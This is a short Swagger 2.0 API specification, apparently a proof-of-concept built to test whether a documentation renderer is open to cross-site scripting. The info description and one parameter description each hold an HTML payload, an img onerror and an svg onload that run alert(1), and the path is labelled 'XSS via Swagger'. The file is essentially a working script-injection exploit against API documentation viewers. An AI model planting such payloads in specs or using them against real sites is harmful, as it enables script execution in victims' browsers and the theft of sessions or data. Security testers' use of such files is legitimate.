{
  "swagger": "2.0",
  "info": {
    "title": "Swagger PoC",
    "description": "<img src=x onerror=alert(1)>"
  },
  "paths": {
    "/poc": {
      "get": {
        "summary": "XSS via Swagger",
        "parameters": [
          {
            "name": "test",
            "in": "query",
            "description": "<svg/onload=alert(1)>",
            "required": false,
            "type": "string"
          }
        ],
        "responses": {
          "200": {
            "description": "ok"
          }
        }
      }
    }
  }
}
